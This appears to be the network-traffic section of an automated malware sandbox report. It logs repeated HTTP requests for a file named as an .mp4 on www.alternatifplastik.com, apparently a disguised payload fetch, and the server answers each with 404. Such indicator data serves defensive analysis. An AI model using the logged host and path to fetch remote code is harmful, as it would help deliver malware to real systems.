Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: GET /dixa/Dquqrwaot.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.alternatifplastik.com
Source: global trafficDNS traffic detected: DNS query: www.alternatifplastik.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:47:59 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:02 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:08 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:10 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:13 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:16 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 07 Mar 2025 14:48:19 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
